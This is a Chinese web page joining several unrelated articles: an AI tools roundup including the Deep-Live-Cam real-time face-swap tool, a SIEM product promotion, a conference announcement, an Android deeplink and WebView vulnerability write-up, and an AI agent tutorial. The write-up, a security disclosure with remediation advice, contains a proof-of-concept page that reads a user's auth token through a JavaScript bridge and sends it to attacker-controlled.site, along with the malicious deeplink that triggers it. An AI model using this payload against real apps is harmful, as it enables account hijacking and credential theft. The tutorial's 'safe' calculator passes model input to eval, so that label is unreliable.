Supabase 是一个基于 Postgres 的开发平台,把数据库、认证、即时 API、Edge Functions、存储和向量能力放在同一套体系里。放在这篇文章里,它更值得关注的地方不只是“后端平台”这个身份,而是已经把向量、嵌入和 AI 应用需要的数据能力直接纳入了产品主线。

核心能力

一体化的数据与应用底座

Supabase 提供完整的 Postgres 数据库、认证、API、实时能力、Edge Functions 和存储服务,适合直接作为 Web、移动和 AI 应用的底座。对很多团队来说,这意味着数据、权限和应用后端可以放在同一套平台里管理,不需要再额外拆出很多基础设施。

Supabase2.png

内置向量检索与向量嵌入管理能力

Supabase 已经把 AI 与向量能力直接做进平台里,支持用 Postgres 和 pgvector 存储、索引和查询 embeddings,也支持语义搜索、关键词搜索和混合搜索。同时,它还能结合 Edge Functions、队列、触发器和扩展机制处理向量嵌入的自动生成、更新和重试,更适合承接持续增长的上下文数据和检索需求。

多模态生成

Stable Diffusion WebUI

Stable Diffusion WebUI1.png

Stable Diffusion WebUI 是一个基于 Gradio 实现的 Stable Diffusion 网页界面,把本地部署、参数控制和图像生成放到同一个交互入口里。相比更偏节点工作流的工具,它更接近经典的图像生成控制台,适合直接围绕文生图、图生图和模型参数做细致操作。

核心能力

图像生成与编辑能力

Stable Diffusion WebUI 支持文生图和图生图两种核心生成模式,也覆盖局部重绘、画面外扩和图像放大等常见图像生成与编辑能力。对于希望直接围绕提示词、参考图和修图流程做操作的用户来说,这类能力已经足够支撑大部分常见场景。

Stable Diffusion WebUI2v.png

参数控制和本地扩展

Stable Diffusion WebUI 提供了比较细的参数控制能力,包括采样方法、提示词权重、批量生成、参数回读和多维度参数对比。同时,它也具备相对成熟的本地运行和扩展基础,支持向量嵌入、文本反演等能力,也能结合扩展生态继续丰富功能。

ComfyUI

ComfyUI1.png

ComfyUI 是一个面向视觉 AI 的可视化工作流工具,核心形态是基于节点和流程图来设计、执行复杂的 Stable Diffusion 流程。相比更像传统控制台式界面的 Stable Diffusion WebUI,它更强调模块化组合、流程复用和复杂生成链路的搭建。

核心能力

基于节点的生成流程编排能力

ComfyUI 支持通过节点、图和流程图界面来搭建复杂的 Stable Diffusion 工作流,很多实验和组合不需要写代码就可以完成。对需要频繁调整提示词、模型、控制条件和生成步骤的用户来说,这种方式会比单次参数调节更灵活。

ComfyUI2.png

更适合复用和扩展复杂生成任务

ComfyUI 支持多种图像模型和生成能力,也已经把视频、图像、3D、音频等场景纳入了产品能力范围。同时,它还提供示例工作流、桌面应用和完整文档,方便把生成流程保存、复用,并继续扩展成更复杂的任务链路。

Deep-Live-Cam

Deep-Live-Cam1.png

Deep-Live-Cam 是一个面向实时视频处理的开源项目,核心能力是实时换脸和一键式视频处理。相比更偏图像生成或流程编排的多模态工具,它更直接把生成式能力放进摄像头、直播和视频内容处理链路里,重点就在“实时可用”这件事上。

核心能力

实时视频生成人脸替换能力

Deep-Live-Cam 支持实时换脸,也支持一键式视频处理,重点放在视频和直播场景下的即时效果。它可以直接把生成能力作用在视频流上,而不是停留在静态图片生成或后期编辑阶段。

Deep-Live-Cam2.png

摄像头接入与本地运行能力

Deep-Live-Cam 可以直接结合摄像头输入使用,也支持对现有视频内容进行处理。同时,它提供了本地部署方式,并围绕 GPU、推理依赖和运行环境给出了较完整的安装说明,方便把这类能力直接跑在自己的设备环境里。

Deep-Live-Cam3.png

结语

如果说 OpenClaw 让更多人看到了 AI 在个人场景下的执行能力,那么过去几个月的市场变化也说明,这类能力已经不再停留在个人工具层面。

无论是地方围绕 OpenClaw 推动产业生态,还是厂商快速基于它做产品化封装,比如 Kimi Claw、MaxClaw、QClaw 等,热门 AI 工具一旦走向更复杂的应用环境,最终都会继续往企业和行业场景延伸。而企业需要的,不只是一个会对话、会调用工具的智能体,而是一套能接入数据、嵌入流程、限制权限、支持协作的系统环境。

如果你想了解 AI 如何真正进入业务系统、参与真实业务流程,也可以前往 NocoBase 官网进一步了解我们在 AI 员工能力和业务系统搭建上的相关实践。

相关阅读:

企业在挑选安全信息和事件管理(SIEM)解决方案时,往往将焦点放在功能数量、合规标准覆盖度及部署方式上,却容易忽视一个核心关键——日志的快速搜索与分析能力。 不少企业误以为功能越全的SIEM越实用,却忽略了核心价值落地的前提:若无法在海量日志中快速定位关键信息,即便功能再丰富,其安全防护价值也会大幅缩水,难以支撑企业应对实时安全威胁。

一、SIEM选型的常见误区

在SIEM实际选型过程中,很多企业陷入认知误区,最终导致系统部署后运维成本持续攀升,安全效能却不达预期。

只关注产品是否支持多源日志收集,认为能汇总日志即是满足需求,完全忽略日志查询与分析的核心性能; 过度依赖硬件堆叠提升运行效率,不仅推高硬件投入成本,还无法从根本上解决性能瓶颈; 使用多工具拼接,既增加了系统管理复杂度,又容易出现数据孤岛,后续维护难度与成本同步增加。

二、日志搜索能力为何是 SIEM 的核心

事实上,日志搜索能力才是SIEM的核心竞争力。 SIEM的核心任务围绕安全事件调查、异常行为分析、合规审计支持及事后取证分析展开,而这四大场景的落地,都离不开快速、稳定的日志搜索能力作为支撑。在安全事件突发时,若日志搜索响应时间过长,安全团队无法及时锁定攻击源头、追溯攻击路径,就会错失最佳处置时机。

三、评估 SIEM 日志搜索能力的三个技术点

企业评估SIEM日志搜索能力,可聚焦三大核心技术点,精准判断产品适配性。 首先,看是否支持结构化日志存储。结构化存储能对日志数据进行规范化解析与分类,大幅提升查询效率,避免全量日志扫描带来的性能损耗,这是SIEM适配大规模日志环境的基础条件。 其次,核查是否具备成熟的索引机制。索引直接决定系统在日志量持续增长后的性能稳定性,缺乏完善索引机制的SIEM,会随日志积累出现响应变慢、卡顿等问题,性能随时间推移明显下滑。 最后,关注搜索引擎是否针对安全场景定制设计。只有贴合安全运维实际需求的搜索引擎,才能高效支持多条件组合查询、精准时间范围检索等复杂操作,适配安全事件溯源与合规审计的多样化需求。

四、EventLog Analyzer 在 SIEM 选型中的优势

EventLog Analyzer在SIEM选型中,采用ES(elastic search)技术,轻松应对海量日志的检索。凭借成为企业的优选方案。
图片
(1)日志写入时即完成自动解析与索引构建,无需额外人工干预,从源头保障搜索效率; 
(2)支持大规模日志长期安全留存,满足合规日志留存要求的同时,确保存量日志检索性能稳定; 
(3)其搜索性能不依赖高端硬件,在普通服务器环境下,即可实现千万级日志的秒级搜索响应,大幅降低企业硬件投入成本。 
曾在EventLog Analyzer中做过这样一个有趣的实验: 如果不考虑硬件因素,对1千万规模日志执行搜索需要多长时间得到结果 ? 
测试环境配置如下:
•操作系统:Windows Server 2012 R2 Standard
 •处理器:Intel Core 系列
 •内存:16 GB
 •CPU:4 核 该环境为常规服务器配置,并非高性能硬件。在实际测试环境中,对 1000 万条日志数据进行搜索,查询耗时约 2 秒。

(4)EventLog Analyzer兼顾安全运营与合规审计双重场景,既能快速支撑安全团队开展事件调查、异常检测等工作,提升安全响应效率,又能通过高效日志检索能力,快速生成符合各类合规标准的审计报告,减少合规工作人力投入。

五、总结

SIEM绝非简单的功能堆叠集合,而是企业长期运行的核心安全基础设施,其投入回报与实际可用性,均由日志搜索能力直接决定。对于日志规模随业务发展持续增长的企业而言,选择具备成熟搜索技术的SIEM解决方案,既能有效控制硬件、运维等综合成本,又能提升安全响应效率,让安全投入真正转化为防护效能。

EventLog Analyzer以日志搜索性能为核心抓手,帮助企业在不增加系统复杂度、不提升硬件成本的前提下,构建稳定、高效的日志管理与SIEM能力,为企业数字化转型筑牢安全防线。

从「AI For What」到「Value From AI」,100+可落地实践案例打通 AI 实战最后一公里!

4 月 16 日-4 月 18 日,QCon 全球软件开发大会将在北京举办。本届大会锚定 Agentic AI 时代的软件工程重塑,聚焦 Agentic AI、多智能体协作、算力优化、技术债治理、多模态和 AI 原生基础设施等前沿话题,邀请来自腾讯、阿里、百度、华为、蚂蚁、小米、网易等企业技术专家,带来百余项真实落地案例,系统性分享前沿洞察与实战干货,以技术共创探索 AI 落地新路径。

阿里巴巴淘宝闪购资深算法专家桑梓森已确认出席 “Agentic Engineering” 专题,并发表题为大模型驱动下的生成式搜推:淘宝闪购全链路重构实践的主题分享。淘宝闪购业务规模快速增长,对搜索推荐系统的效率与精准度提出了更高要求。传统搜推算法在特征工程、用户理解和商品表征上已逐步触及天花板。本次分享聚焦大模型时代下闪购搜推系统的技术演进,结合真实业务场景,分享关键技术选型的决策过程、落地中的踩坑经验与效果数据。

桑梓森,淘宝闪购搜推排序团队负责人,主导淘宝闪购搜索/推荐系统算法优化与系统演进,专注于即时零售场景下的多目标优化、个性化推荐以及 LLM&生成式相关技术在搜推场景的落地。他在本次会议的详细演讲内容如下:

演讲提纲

  1. 开场:闪购业务背景与搜推挑战

  • 闪购业务特点、传统搜推瓶颈

2. 大模型 LLM/VLM 多模态在搜推全链路落地

  • Query 理解与改写

  • 商品理解与表征

  • 召回与排序中的大模型特征注入

  • 用户冷启动

3. 算力 Scaling Up 策略

  • 模型维度的 Scaling

  • 训练与推理优化

  • 算力 ROI 度量 torch 训推迭代

4. 生成式搜推新范式探索

  • HSTU 类在搜推探索落地

  • RQ-VAE 生成式召回

  • G-E 生成式重混排落地

5. 面向 AI 搜推的核心链路升级改造

6. 总结与展望

这样的技术在实践过程中有哪些痛点?

  1. 搜推传统模型与大模型的对齐;

  2. 生成式范式落地中的坑点、工程以及算法之间的协同优化;

  3. AI 时代搜索的变化及解法。

演讲亮点

  1. 大模型与传统搜推深度结合:精排、召回、多模态训练等;

  2. 生成式技术演进与落地:RQ-VAE 等实践、G-E 生成式混排在搜推中的落地;

  3. AI 搜推面向千问场景的业务接入及迭代优化。

听众收益

  1. 大模型能力在搜推全链路落地的算法与工程范式;

  2. 生成式搜推(HSTU / RQ-VAE / G-E)从论文到生产的完整落地参考;

  3. 面向 AI 时代,传统搜推与 AI 之间的结合。

除此之外,本次大会还策划了Agentic Engineering多模态理解与生成的突破记忆觉醒:智能体记忆系统的范式重塑与产业落地具身智能与物理世界交互Agent Infra 架构设计AI 重塑数据生产与消费AI 原生基础设施AI 驱动的技术债治理小模型与领域适配模型大模型算力优化Agent 可观测性与评估工程AI for SRE等 20 多个专题论坛,届时将有来自不同行业、不同领域、不同企业的 100+资深专家在 QCon 北京站现场带来前沿技术洞察和一线实践经验。

大会售票 8 折倒计时最后一周,更多详情可扫码或联系票务经理 18514549229 进行咨询。

0x00 技术综述

在现代 Android 混合开发 (Hybrid App) 中,应用通常会通过注册自定义 URL Scheme 的方式实现从 Web 端或第三方应用直接调起内部业务。如果开发者对外部输入的 Intent 数据处理不当,特别是在其作为 WebView 加载源时未进行严格的域校验,将导致敏感业务逻辑被外部劫持,进而演化为沙箱内任意文件读取或敏感数据(如认证凭证)泄露。

本文将通过对某智慧生活类 APP(以下代称 TargetApp)的深度分析,展示如何利用其组件导出及不安全的 WebView 交互实现远程 Token 窃取。

0x01 技术背景与核心概念

在深入分析该漏洞之前,有必要了解 Android 应用架构中几个关键的安全机制:

1. Android 组件 (Components) 与导出属性 (Exported)

Android 应用由四大核心组件构成:Activity (界面)、Service (后台服务)、Broadcast Receiver (广播接收器) 和 Content Provider (内容提供者)。每一个组件在 AndroidManifest.xml 中声明。

  • android:exported: 该属性决定了组件是否可以被应用外部的组件启动。


    • false: 表示该组件仅限应用自身或具有相同 UID 的应用访问(私有组件)。
    • true: 表示该组件可以被系统中任何其他应用拉起(导出组件)。如果由于业务需求必须设置为 true,则需要额外的权限保护或数据校验。

2. Intent 机制与 Intent Filter

Intent 是 Android 应用内部及应用间进行消息传递的核心机制。

android_security_components_diagram.png

  • 显式 Intent (Explicit Intent): 明确指定了目标组件的类名。安全性高。
  • 隐式 Intent (Implicit Intent): 不指定类名,仅通过 Action 或 Data 进行模糊匹配。Schema 调起主要依赖于隐式 Intent。
  • BROWSABLE: 这是一个关键的 Category 属性。如果一个 Intent Filter 包含 CATEGORY_BROWSABLE,意味着它允许被系统浏览器中的网页跳转直接触发。

3. DeepLink 与 Scheme 机制

DeepLink(深度链接)允许应用注册一个自定义的协议头(如 myapp://)。当系统收到这种 URI 请求时,会查找到注册了对应 Scheme 的应用并将其拉起。这种机制极大地提升了用户体验,但也引入了不可信数据输入的风险。如果应用在拉起后直接使用 URI 中的参数而不进行白名单校验,就会产生“重定向”风险。

4. WebView 与 JavascriptInterface (Hybrid 安全模型)

为了同时拥有 Web 的灵活性和 Native 的高性能,许多应用采用混合开发。

  • addJavascriptInterface: 该方法允许开发者将一个 Java 对象映射到 WebView 的 JavaScript 环境中。
  • 安全加固与 @JavascriptInterface: 在 Android 4.2 (API 17) 之前,暴露给 JS 的 Java 对象的所有公共方法都可以被反射调用,存在严重的远程代码执行 (RCE) 风险。此后,系统要求必须在方法上显式标记 @JavascriptInterface 注解,JS 才能调用。
  • 逻辑风险: 虽然反射攻击被堵住,但业务逻辑泄露依然存在。如果开发者将敏感的 Token 获取方法标记了该注解,并在 WebView 加载攻击者控制页面时未进行 URL 过滤,攻击者依然可以通过合法调用泄露用户隐私。
    • *

0x02 暴露面与边界信任风险评估 (Exposure & Boundary Trust Assessment)

在移动安全评估中,外部攻击面的核心在于“可被外界直接触达的接口”。对于 TargetApp 而言,其最显著的暴露面在于 Manifest 中声明的导出 Activity。

2.1 导出组件暴露性深度评估

通过反编译配置,我们锁定了一个承担业务分发职责的核心组件:SchemaProxyActivity

1.png

关键属性详细审计:

  1. Visibility (android:exported="true"): 该组件被明确标记为外部可见且未声明任何 android:permission 保护。这意味着系统中任何具有 INTERNET 权限的第三方恶意应用(恶意 App)均可直接构造 Intent 唤起该组件。
  2. Access Category (BROWSABLE): 包含 android.intent.category.BROWSABLE 属性。这是一种极高风险的配置,它将应用的攻击面从本地应用间通信(IPC)直接扩展到了全球互联网。攻击者只需通过社会工程学手段诱导受害者点击一个经过特殊构造的链接(如网页中的 <a> 标签),即可实现远程控制流劫持。
  3. LaunchMode (singleTask): 该组件采用 singleTask 启动模式。在安全视角下,这意味着该 Activity 承担了“分发器”的角色。如果该组件已在运行,新的攻击 Intent 会通过 onNewIntent 方法注入。如果开发者在处理 onNewIntent 时未进行严格的数据源校验,将导致持续性的攻击风险。
  4. UI Appearance (Theme.Translucent): 该组件使用了透明主题。这意味着在恶意跳转发生时,用户可能完全察觉不到应用曾被拉起过(瞬时跳转至下一级页面),极大地提高了攻击的隐蔽性。

2.2 Intent 过滤器 (Intent Filter) 数据解析分析

该组件配置了多组自定义协议映射,其中最核心的攻击向量如下:

<activity android:name\="com.xxx.lib.common.view.activity.SchemaProxyActivity" ...\>  
    <intent-filter\>  
        <action android:name\="android.intent.action.VIEW"/>  
        <category android:name\="android.intent.category.DEFAULT"/>  
        <category android:name\="android.intent.category.BROWSABLE"/>  
        <data android:scheme\="target\_app\_scheme"/> <!-- 自定义伪私有协议 -->  
    </intent-filter\>  
</activity\>

协议设计缺陷分析:

  • 缺乏域收敛 (Domain Restriction): 开发者仅定义了 scheme,而未通过 android:hostandroid:path 对数据源进行约束。这导致该协议成为了一个“全通权限”的入口,任何遵循该协议格式的 URI 都会被盲目接收。
  • 私有 Action 风险: 观察到还定义了 com.xxx.android.scheme 这种自定义 Action。这类 Action 往往涉及底层的业务逻辑分发,且通常缺乏标准化的安全过滤机制,是寻找越权操作的重点对象。
    • *

0x03 调用链深度追踪 (Implementation Analysis)

3.1 逻辑分发层:Intent 重定向漏洞

SchemaProxyActivity 的逻辑入口处,应用对传入的 Uri 数据进行了解析。源码逻辑(sources/com/xxx/lib/module/g.java)显示:

public final void dispatchUri(Activity activity, Uri uri) {  
    if (uri \== null) return;  
    String authority \= uri.getAuthority();  
      
    // 权限与路径解析  
    if (kotlin.jvm.internal.x.b(authority, "openurl")) {  
        // \[漏洞点A\]:直接获取名为 "url" 的参数  
        String rawUrl \= uri.getQueryParameter("url");  
        if (android.text.TextUtils.isEmpty(rawUrl)) return;  
          
        String decodedUrl \= Uri.decode(rawUrl);  
        // \[漏洞点B\]:未对 decodedUrl 进行任何白名单过滤或域校验  
        // 直接将其作为目标地址启动 WebView 容器  
        launchInternalWebView(activity, decodedUrl);  
    }  
}

缺陷分析: 上述代码存在典型的 Intent Redirection(Intent 重定向) 缺陷。应用将外部可控的参数 url 直接信任并透传给内部的高效组件(WebView),从而允许外部攻击者通过此跳转进入受限的应用内部环境。


0x04 核心载荷分析:WebView 桥接风险 (Native Bridge Attack)

4.1 注入接口的敏感权限

当攻击者构造的恶意 URL 被加载后,受害应用的 WebActivity 会初始化其业务桥接接口。 在 ProgressWebView.java 中,我们观察到如下配置:

3.png

// 危险配置:暴露 Java 接口至 JS 执行环境  
this.mWebView.addJavascriptInterface(new NativeInterface(context), "bridgeObject");  
​  
// 危险配置:开启通用的跨源策略,允许跨文件域操作  
this.mWebView.getSettings().setAllowUniversalAccessFromFileURLs(true);

4.2 敏感方法评估与凭证持久化风险

通过对注入的 NativeInterface(逻辑位置:sources/d3/h.java)进行反汇编,发现其标注了 @JavascriptInterface 的方法中包含直接返回敏感凭证的操作:

@JavascriptInterface  
public final String sendScoreAndToken() {  
    // 逻辑缺陷:未校验调用源 URL,直接从全局上下文读取 Token  
    LoginData account \= App.getInstance().getAccountManager().getLoginData();  
    String token \= (account != null) ? account.getToken() : "";  
      
    // 构造 JSON 返回给 JavaScript 环境  
    return String.format("{\\"token\\":\\"%s\\", \\"score\\":%d}", token, account.getScore());  
}

深度分析与危害评估:

  1. 凭证等效性:在该应用的业务逻辑中,返回的 token 通常作为 HTTP 请求头(如 AuthorizationX-Auth-Token)用于身份验证。其危害级别等同于传统的 HTTP Session Cookie。
  2. 跨站脚本攻击 (XSS) 延伸:由于 WebView 开启了 setJavaScriptEnabled(true) 且未对加载域名进行白名单限制,攻击者可以通过 DeepLink 强迫应用加载恶意页面。恶意页面中的脚本可直接调取上述接口,实现“零交互”式的 Token 窃取。
  3. Cookie 持久化风险:虽然该接口直接返回 Token,但通过开启的 setAllowUniversalAccessFromFileURLs(true),攻击者理论上可以通过 XHR 加载 file:// 协议读取应用私有目录下的 WebView 数据库(如 webviewCookiesChromium.db),从而获取受 HttpOnly 保护的传统 Cookie。




0x05 漏洞复现证明 (PoC Implementation)

5.1 构造复现页面

攻击者在远程服务器部署如下 HTML (poc.html),用于触发漏洞并窃取凭证:

<html\>  
<head\>  
    <meta charset\="UTF-8"\>  
    <title\>优惠领取</title\>  
</head\>  
<body\>  
    <script\>  
        function startExploit() {  
            try {  
                // 调用导出的 Java 接口  
                if (window.harmonyAndroidScore) {  
                    var data \= window.harmonyAndroidScore.sendScoreAndToken();  
                      
                    // 将敏感数据外传至攻击者服务器  
                    var xhr \= new XMLHttpRequest();  
                    xhr.open("GET", "http://attacker-controlled.site/log?data=" + encodeURIComponent(data), true);  
                    xhr.send();  
                      
                    alert("检测到敏感凭证泄露: " + data);  
                }  
            } catch (e) { console.error(e); }  
        }  
        // 延迟执行确保 Native 接口注入完成  
        setTimeout(startExploit, 1000);  
    </script\>  
</body\>  
</html\>

5.2 触发链条

诱导受害者点击如下恶意链接即可触发自动化攻击流: ilife798://openurl?url=http://attacker-controlled.site/poc.html

deeplink_webview_attack_flow.png

5.3 复现结果证明

在测试环境(ADB 连接状态)下执行上述 Payload,攻击者服务器成功捕获到由应用内部接口返回的 JSON 数据:

53941675bc0c002e12518e9cfc3b2833.jpg

{  
  "token": "be\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*f5c",  
  "score": "0"  
}

结论证明:该 Token 可直接用于替换 HTTP 请求头,从而实现对目标用户账户的完全劫持。


0x06 防御方案 (Remediation)

1. 强化 Intent 参数校验

在分发层加入严格的 URL 白名单校验逻辑。

public boolean isTrustedUrl(String url) {  
    Uri uri \= Uri.parse(url);  
    String host \= uri.getHost();  
    // 仅允许官方受信任域名  
    return host != null && host.endsWith(".official-domain.com");  
}

2. WebView 交互域隔离

bridgeObject 的关键方法中,应增加对当前加载 URL 的二次验证:

@JavascriptInterface  
public final String sendScoreAndToken() {  
    String currentUrl \= mWebView.getUrl();  
    if (!verifyOrigin(currentUrl)) {  
        return "{\\"error\\":\\"unauthorized\_origin\\"}";  
    }  
    // 返回正常逻辑  
}

3. 系统配置加固

  • 设置 android:allowBackup="false"
  • 将内部分发 Activity 权限设置为 android:protectionLevel="signature" 或关闭导出属性。
    • *

结论: 本案例展示了组件导出与逻辑分发缺陷如何转化成严重的敏感信息劫持漏洞。开发者应高度重视跨边界数据流的过滤与 WebView 环境的权限隔离。


免责声明: 相关技术细节已反馈至有关部门。本文仅供学术研讨,严禁用于实际非法攻击。

AI Agent 是能够自主感知环境、调用工具、循环推理并完成复杂目标的 AI 系统。与单次问答的大模型不同,Agent 具备"思考→行动→观察→再思考"的闭环能力,可以分解多步任务、跨工具协作、持久记忆上下文。本文从核心架构出发,覆盖最小可运行实现、工具定义、记忆管理、框架选型到多 Agent 协作,帮助开发者建立完整的 Agent 构建认知体系。


什么是 AI Agent?

AI Agent 是以大语言模型(LLM)为核心推理引擎,配备感知输入、规划决策、记忆存储、工具执行四大能力模块的自主 AI 系统。

与普通 LLM 调用的核心区别:

维度普通 LLM 调用AI Agent
交互方式单轮输入→输出多轮循环,自主决策下一步
工具使用可调用外部 API、代码、数据库
记忆仅当前上下文窗口短期 + 长期持久记忆
任务类型单一问答多步骤复杂目标分解
自主性可在限定范围内自主行动

OpenAI 在 2025 年发布的 Agents SDK 将其定位描述为:"配备指令和工具的 LLM,能通过内置 Agent 循环自动处理工具调用和持续迭代。"


Agent 的四大核心模块

构建一个完整的 Agent,需要理解四个基础模块:

1. 感知(Perception)

Agent 接收外部输入的能力。输入可以是文本、图像、文件、API 返回值、用户指令等。现代多模态模型(GPT-4o、Claude 3.5、Gemini 1.5)已支持文本+图像联合感知。

2. 规划(Planning)

Agent 分解目标、制定行动计划的推理机制。主流方法:

  • ReAct(Reason + Act):交替输出推理过程(Thought)和动作(Action),最常用
  • CoT(Chain of Thought):逐步思考,适合数学/逻辑推理
  • ToT(Tree of Thoughts):探索多条路径,适合复杂决策
  • Plan-and-Execute:先完整规划,再逐步执行,适合长任务

3. 记忆(Memory)

Agent 存储和检索信息的机制:

记忆类型存储位置特点实现方式
短期记忆上下文窗口会话内可见,重启丢失messages 列表
长期记忆外部数据库跨会话持久,需主动检索向量数据库(Pinecone、Chroma)
工作记忆中间变量任务执行过程中的临时状态LangGraph State
程序记忆代码/提示词固化的行为规则System Prompt

4. 工具(Tools)

Agent 调用外部能力的接口。本质是将 Python 函数暴露给 LLM,LLM 决定何时调用、传什么参数。常见工具类型:搜索引擎、代码解释器、文件读写、数据库查询、HTTP API 请求。


Agent Loop:核心运行机制

Agent 的运行遵循一个固定循环,直到任务完成或达到最大步数:

用户输入
   ↓
LLM 推理(输出 Thought + Action 或 Final Answer)
   ↓
是否调用工具?
   ├── 是 → 执行工具 → 获取 Observation → 回到 LLM 推理
   └── 否 → 输出 Final Answer → 结束

这就是 ReAct 框架的核心。每一轮循环,LLM 接收的 messages 包含:系统提示 + 历史对话 + 所有工具调用记录 + 最新 Observation。


最小可运行 Agent(从零手写)

不依赖任何框架,用 Python + OpenAI API 实现一个完整 Agent:

from openai import OpenAI
import json

client = OpenAI(
    api_key="你的API_KEY",
    base_url="https://api.openai.com/v1"  # 或兼容 OpenAI 格式的其他服务地址
)

# ① 定义工具
def get_weather(city: str) -> str:
    """模拟天气查询"""
    return f"{city}今天晴,气温 22°C"

def calculate(expression: str) -> str:
    """安全计算数学表达式"""
    try:
        return str(eval(expression))
    except Exception as e:
        return f"计算错误: {e}"

# ② 工具注册(生成 JSON Schema,供 LLM 理解)
tools = [
    {
        "type": "function",
        "function": {
            "name": "get_weather",
            "description": "查询指定城市的天气",
            "parameters": {
                "type": "object",
                "properties": {"city": {"type": "string", "description": "城市名"}},
                "required": ["city"]
            }
        }
    },
    {
        "type": "function",
        "function": {
            "name": "calculate",
            "description": "计算数学表达式",
            "parameters": {
                "type": "object",
                "properties": {"expression": {"type": "string"}},
                "required": ["expression"]
            }
        }
    }
]

# ③ 工具分发映射
tool_map = {"get_weather": get_weather, "calculate": calculate}

# ④ Agent 主循环
def run_agent(user_input: str, max_steps: int = 10):
    messages = [
        {"role": "system", "content": "你是一个助手,可以查天气和做计算。"},
        {"role": "user", "content": user_input}
    ]

    for step in range(max_steps):
        response = client.chat.completions.create(
            model="gpt-4o",
            messages=messages,
            tools=tools,
            tool_choice="auto"
        )
        msg = response.choices[0].message

        # 无工具调用 → 任务完成
        if not msg.tool_calls:
            print(f"最终回答:{msg.content}")
            return msg.content

        # 有工具调用 → 执行并回传结果
        messages.append(msg)
        for tc in msg.tool_calls:
            fn_name = tc.function.name
            fn_args = json.loads(tc.function.arguments)
            result = tool_map[fn_name](**fn_args)
            print(f"[工具] {fn_name}({fn_args}) → {result}")
            messages.append({
                "role": "tool",
                "tool_call_id": tc.id,
                "content": result
            })

    return "达到最大步数,任务未完成"

# 运行
run_agent("北京今天适合穿什么?另外 128 * 37 等于多少?")

关键设计点

  • tool_map 将工具名映射到实际函数,避免 eval 动态调用的安全风险
  • 每次工具调用结果以 role: tool 格式追加到 messages,LLM 下一轮能看到
  • max_steps 防止死循环,生产环境建议设为 15-20

用 OpenAI Agents SDK 构建(生产推荐)

OpenAI Agents SDK 是 Swarm 的生产级升级,2025 年发布,更简洁:

from agents import Agent, Runner, function_tool

@function_tool
def search_web(query: str) -> str:
    """搜索互联网获取最新信息"""
    # 接入真实搜索 API
    return f"搜索 '{query}' 的结果:..."

@function_tool
def run_code(code: str) -> str:
    """在沙箱中执行 Python 代码"""
    # 接入代码执行环境
    return f"执行结果:..."

# 创建 Agent
agent = Agent(
    name="研究助手",
    instructions="你是一个研究助手,能搜索信息并执行代码验证结论。",
    tools=[search_web, run_code]
)

# 运行
result = Runner.run_sync(agent, "分析 2025 年 AI Agent 框架的发展趋势")
print(result.final_output)

SDK 内置了 Agent Loop、自动 Schema 生成、追踪可视化,省去手写循环的工作。


框架选型指南

框架适用场景学习曲线特点
裸实现(推荐入门)学习原理、简单任务完全理解底层机制
OpenAI Agents SDK快速生产、多 Agent轻量,handoffs 机制优秀
LangGraph复杂状态机、长任务图结构编排,持久化强
LangChainRAG + Agent 混合生态最全,抽象层多
AutoGen(微软)多 Agent 对话协作对话驱动,适合模拟场景

选型建议

  • 第一次构建 → 先裸实现,理解 Agent Loop
  • 需要上生产 → OpenAI Agents SDK 或 LangGraph
  • 任务有明确状态流转 → LangGraph
  • 主要是 RAG 增强 → LangChain

记忆系统实战

短期记忆:直接用 messages 列表

# 多轮对话直接在 messages 中追加,自动形成短期记忆
messages = [{"role": "system", "content": "你是助手"}]
messages.append({"role": "user", "content": "我叫小明"})
# ... LLM 回复 ...
messages.append({"role": "user", "content": "我叫什么?"})
# LLM 可从上下文找到答案

长期记忆:向量数据库检索

from chromadb import Client

db = Client()
collection = db.get_or_create_collection("agent_memory")

# 存储记忆
collection.add(
    documents=["用户偏好:喜欢简短回答"],
    ids=["pref_001"]
)

# 检索相关记忆(在构建 System Prompt 前调用)
results = collection.query(query_texts=["用户风格"], n_results=3)
relevant_memory = "\n".join(results["documents"][0])

七牛云 AI 推理服务内置的 MCP(Model Context Protocol)支持标准化记忆编排,开发者无需本地部署向量库即可构建带长期记忆的 Agent 应用。


多 Agent 协作设计

当单个 Agent 能力边界不足以完成复杂任务时,引入多 Agent 协作。主流两种模式:

模式一:分层调度(Orchestrator + Workers)

用户输入
    ↓
调度 Agent(Orchestrator)
    ├── 研究 Agent(负责搜索信息)
    ├── 代码 Agent(负责执行计算)
    └── 写作 Agent(负责生成报告)

OpenAI Agents SDK 通过 handoffs 机制实现:调度 Agent 在合适时机将控制权移交给专门 Agent,各 Agent 有独立的工具集和系统提示。

模式二:流水线(Pipeline)

每个 Agent 处理一个阶段,输出作为下个 Agent 的输入。适合数据处理、内容生产等有明确顺序的场景。

七牛云 2025 年实践案例中,多智能体采用分层设计:规划层(DeepSeek-R1 擅长推理规划)+ 执行层(DeepSeek-V3 支持函数调用),通过职责分离规避单一模型在推理与工具调用上的能力权衡问题。


调试与追踪

Agent 调试的核心难点是"看不见中间过程",建议从第一行代码就加上追踪:

# 方法一:打印每步 messages(简单有效)
for msg in messages:
    print(f"[{msg['role']}] {str(msg.get('content', ''))[:100]}")

# 方法二:OpenAI Agents SDK 内置追踪
# 运行后自动在 platform.openai.com/traces 生成可视化时间线

# 方法三:LangSmith(LangGraph 生态)
# 设置环境变量后自动追踪每个节点的输入输出
import os
os.environ["LANGCHAIN_TRACING_V2"] = "true"
os.environ["LANGCHAIN_API_KEY"] = "你的key"

常见问题

Q:Agent 和 RAG 是什么关系?
RAG(检索增强生成)是一种为 LLM 补充外部知识的技术,本质上是一种"工具"。Agent 可以将 RAG 作为其众多工具之一——当需要查询知识库时调用 RAG,当需要执行代码时调用代码解释器。RAG 回答单次问题,Agent 完成多步任务。

Q:构建 Agent 一定要用 GPT-4 吗?成本很高?
不必。工具调用能力(Function Calling)是选择模型的核心指标。DeepSeek-V3、Kimi K2、Claude 3.5 Haiku、Qwen2.5-72B 均支持工具调用,成本远低于 GPT-4o。建议先用小模型验证逻辑,上线前再评估模型效果和成本的平衡点。

Q:Agent 执行过程中出错了怎么办?
生产级 Agent 需要实现:① 工具调用异常捕获并返回错误信息给 LLM;② max_retries 对同一工具失败后重试逻辑;③ 超时熔断,避免单步卡死整个流程;④ 检查点(Checkpoint)支持,LangGraph 内置此能力。

Q:Agent 会不会无限循环消耗 Token?
务必设置 max_steps 上限。此外,可在 System Prompt 中明确指示:"如果连续两步没有进展,输出 Final Answer 结束任务"。OpenAI Agents SDK 和 LangGraph 都提供了内置的循环终止机制。

Q:个人开发者适合用 Agent 做什么?
